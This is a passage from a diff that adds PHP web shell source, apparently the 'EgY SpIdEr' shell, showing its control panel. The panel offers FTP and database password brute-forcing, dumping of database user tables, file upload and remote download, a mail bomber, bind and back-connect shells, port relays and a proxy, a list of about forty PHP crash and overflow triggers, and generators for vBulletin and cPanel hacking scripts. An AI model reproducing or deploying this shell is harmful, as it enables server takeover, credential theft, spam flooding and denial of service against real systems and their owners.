+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;
+}
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text171'],'id98200').$table_up2.div('id98200').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_5_2_3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+{
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
+echo "<tr><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
+echo $te."</td><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
+echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
+ echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+ echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+ echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
+if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+
+
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from egy spider shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
+echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
+if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
+if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>';
+if($ora_on) $select .= '<option value=Oracle>Oracle</option>';
+if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>';
+if($msql_on) $select .= '<option value=mSQL>mSQL</option>';
+if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>';
+$select .= '</select>';
+
+
+echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up3.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
+
+
+echo "</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text81'],'id555555').$table_up2.div('id555555').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo $table_up1.div_title($lang[$language.'_text81'],'id5525555').$table_up2.div('id5525555').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe."</tr></div></table>";
+
+
+echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos39').in('submit','submit',0,'BoF [printf()](PHP<5.2.5) and prior').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos40').in('submit','submit',0,'BoF [mssql_connect(), mssql_pconnect()](PHP<4.4.6) and prior').$fe);
+/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
+echo $te."</td></tr></div></table>";
+echo $fs.$table_up1.div_title($lang[$language.'_text211'],'id11111').$table_up2.div('id11111').$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'.htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text228']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_vb',10,'vb_hacker.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text230']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_cp',10,'pass_cpanel.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo $te.'</div>'.$table_end1.$fe;
+{
+
+
+
+
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+echo $te."</td></tr></div></table>";
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ EgY_SpIdEr | </a> | <a egy_spider@hotmail.com>egy_spider@hotmail.com</a> developer by EgY SpIdEr ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>